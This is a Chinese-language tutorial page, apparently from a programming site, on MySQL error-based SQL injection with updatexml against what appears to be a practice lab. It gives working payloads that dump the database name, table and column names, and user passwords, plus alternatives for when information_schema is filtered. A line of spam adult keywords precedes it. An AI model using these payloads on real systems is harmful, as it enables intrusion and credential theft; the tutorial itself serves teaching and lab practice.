欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

SQL報(bào)錯(cuò)注入之updatexml的實(shí)現(xiàn)

 更新時(shí)間:2024年10月30日 09:10:54   作者:半?糖?  
updatexml函數(shù)通過(guò)輸入不符合XPATH格式的數(shù)據(jù)來(lái)觸發(fā)報(bào)錯(cuò),并利用這一點(diǎn)進(jìn)行SQL注入,通過(guò)分析報(bào)錯(cuò)信息,可以判斷是否存在注入點(diǎn),并逐步爆出數(shù)據(jù)庫(kù)名、表名、字段名以及敏感數(shù)據(jù),感興趣的可以了解一下

1.updatexml報(bào)錯(cuò)原理

updatexml(xml_doument,XPath_string,new_value)
第一個(gè)參數(shù):XML的內(nèi)容
第二個(gè)參數(shù):是需要update的位置XPATH路徑
第三個(gè)參數(shù):是更新后的內(nèi)容
所以第一和第三個(gè)參數(shù)可以隨便寫(xiě),只需要利用第二個(gè)參數(shù),他會(huì)校驗(yàn)?zāi)爿斎氲膬?nèi)容是否符合XPATH格式,當(dāng)我們輸入一個(gè)不符合x(chóng)path語(yǔ)法的語(yǔ)句就報(bào)錯(cuò)了,我們注入利用的就是這一點(diǎn)。

2.判斷是否有注入點(diǎn)

我們?cè)诘刂窓谥休斎?id=1'

我們?cè)诘刂窓谥休斎?id=1'--+

根據(jù)結(jié)果可以判斷出存在數(shù)字型注入,并且頁(yè)面會(huì)打印出報(bào)錯(cuò)信息,所以我們可以利用報(bào)錯(cuò)注入來(lái)解決

3.updatexml報(bào)錯(cuò)注入

3.1爆庫(kù)名

?id=1 and updatexml(1,concat(0x7e,database(),0x7e),0)

0x7e表示~符號(hào),所以數(shù)據(jù)庫(kù)名為security

3.2爆表名

mysql 中的 information_schema 這個(gè)庫(kù) 就像時(shí)MYSQL的信息數(shù)據(jù)庫(kù),他保存著mysql 服務(wù)器所維護(hù)的所有其他的數(shù)據(jù)庫(kù)信息, 包括了 庫(kù)名,表名,列名。

在注入時(shí),information_schema庫(kù)的作用就是獲取 table_schema table_name, column_name .

這些數(shù)據(jù)庫(kù)內(nèi)的信息。如果information_schema庫(kù)被過(guò)濾掉,還可以嘗試使用下述庫(kù)來(lái)代替

sys.schema_auto_increment_columns 

sys.schema_table_statistics_with_buffer

mysql.innodb_table_stats

mysql.innodb_table_index 

?id=1 and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1)

根據(jù)結(jié)果可知當(dāng)前security庫(kù)下有四張表,并且users表最有可能存放用戶(hù)信息

3.3爆字段名

我們通過(guò)sql語(yǔ)句查詢(xún)知道當(dāng)前數(shù)據(jù)庫(kù)有四個(gè)表,根據(jù)表名知道可能用戶(hù)的賬戶(hù)和密碼是在users表中。接下來(lái)我們就是得到該表下的字段名以及內(nèi)容。

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)

根據(jù)結(jié)果可以判斷出字段名不全,這是因?yàn)閡pdataxml函數(shù)只顯示32位,所以我們可以用substr函數(shù)來(lái)慢慢截取來(lái)獲得所有的字段名 

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(column_name),1,32) frominformation_schema.columns where table_name='users'),0x7e),1)

這樣我們最終會(huì)得到所有的字段名

如果我們給select語(yǔ)句多加一個(gè)where條件會(huì)變成什么樣呢?

?id=1 and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)

此次查詢(xún)直接就爆出users表的列名,可以得到兩個(gè)敏感字段就是username和password,最有可能存放用戶(hù)的賬號(hào)密碼

3.4爆數(shù)據(jù)

?id=1 and updatexml(1,concat(0x7e,(select password from users limit1,1),0x7e),1)

通過(guò)limit函數(shù)可以爆出各個(gè)用戶(hù)的密碼

當(dāng)然也可以通過(guò)剛剛所述的substr函數(shù)來(lái)截取密碼

?id=1 and updatexml(1,concat(0x7e,(select substr(group_concat(username,id,password),1,20) from users),0x7e),1)

此次updatexml報(bào)錯(cuò)注入就結(jié)束啦!

到此這篇關(guān)于SQL報(bào)錯(cuò)注入之updatexml的實(shí)現(xiàn)的文章就介紹到這了,更多相關(guān)SQL updatexml內(nèi)容請(qǐng)搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!

  • sqlserver 高性能分頁(yè)實(shí)現(xiàn)分析

    sqlserver 高性能分頁(yè)實(shí)現(xiàn)分析

    SQLServer中有一個(gè)Set Rowcount的的設(shè)置,它的意思是使命令的處理在響應(yīng)指定的行數(shù)之后停止處理命令,利用這個(gè)特點(diǎn),我們可以借用它來(lái)在一個(gè)千萬(wàn)行級(jí)數(shù)據(jù)表中實(shí)現(xiàn)高性能分頁(yè)查詢(xún)。
    2011-04-04
  • SQL?server常見(jiàn)的數(shù)據(jù)類(lèi)型轉(zhuǎn)換整理大全

    SQL?server常見(jiàn)的數(shù)據(jù)類(lèi)型轉(zhuǎn)換整理大全

    這篇文章主要給大家介紹了關(guān)于SQL?server常見(jiàn)的數(shù)據(jù)類(lèi)型轉(zhuǎn)換整理的相關(guān)資料,在 SQL Server中可以使用CAST或CONVERT函數(shù)來(lái)進(jìn)行數(shù)據(jù)類(lèi)型轉(zhuǎn)換,需要的朋友可以參考下
    2023-11-11
  • SQL?Server還原完整備份和差異備份的操作過(guò)程

    SQL?Server還原完整備份和差異備份的操作過(guò)程

    這篇文章主要介紹了SQL?Server?還原?完整備份和差異備份的詳細(xì)操作,本文通過(guò)圖文并茂的形式給大家介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或工作具有一定的參考借鑒價(jià)值,需要的朋友可以參考下
    2022-09-09
  • SQL SELECT 語(yǔ)句的表連接

    SQL SELECT 語(yǔ)句的表連接

    為了從兩個(gè)或多個(gè)表中選出數(shù)據(jù),我們一般使用表連接來(lái)實(shí)現(xiàn)這個(gè)功能。
    2010-09-09
  • SQL Server安裝完成后3個(gè)需要立即修改的配置選項(xiàng)

    SQL Server安裝完成后3個(gè)需要立即修改的配置選項(xiàng)

    SQL Server里你總要去改變的3個(gè)配置選項(xiàng),大家知道是哪三個(gè)嗎?想要知道答案的朋友就仔細(xì)閱讀下文
    2015-08-08
  • 使用SQL語(yǔ)句創(chuàng)建數(shù)據(jù)庫(kù)與創(chuàng)建表操作指南

    使用SQL語(yǔ)句創(chuàng)建數(shù)據(jù)庫(kù)與創(chuàng)建表操作指南

    這篇文章主要給大家介紹了關(guān)于使用SQL語(yǔ)句創(chuàng)建數(shù)據(jù)庫(kù)與創(chuàng)建表操作的相關(guān)資料,創(chuàng)建數(shù)據(jù)庫(kù)是數(shù)據(jù)庫(kù)管理的第一步,而SQL語(yǔ)句是創(chuàng)建數(shù)據(jù)庫(kù)的基本工具,需要的朋友可以參考下
    2023-08-08
  • Sql Server中REPLACE函數(shù)的使用

    Sql Server中REPLACE函數(shù)的使用

    這篇文章主要介紹了Sql Server中REPLACE函數(shù)的使用的相關(guān)資料,需要的朋友可以參考下
    2016-01-01
  • SQLSERVER 本地查詢(xún)更新操作遠(yuǎn)程數(shù)據(jù)庫(kù)的代碼

    SQLSERVER 本地查詢(xún)更新操作遠(yuǎn)程數(shù)據(jù)庫(kù)的代碼

    SQLSERVER 本地查詢(xún)更新操作遠(yuǎn)程數(shù)據(jù)庫(kù)的代碼,需要的朋友可以參考下
    2012-11-11
  • 如何恢復(fù)數(shù)據(jù)庫(kù)的賬號(hào) 登錄名/用戶(hù)名等

    如何恢復(fù)數(shù)據(jù)庫(kù)的賬號(hào) 登錄名/用戶(hù)名等

    當(dāng)重裝數(shù)系統(tǒng)/數(shù)據(jù)庫(kù)之后,如何恢復(fù)數(shù)據(jù)庫(kù)的賬號(hào) 登錄名/用戶(hù)名 孤立用戶(hù) 縮小ldf日志文件 修改sqlserver2000端口
    2013-08-08

    • 最新評(píng)論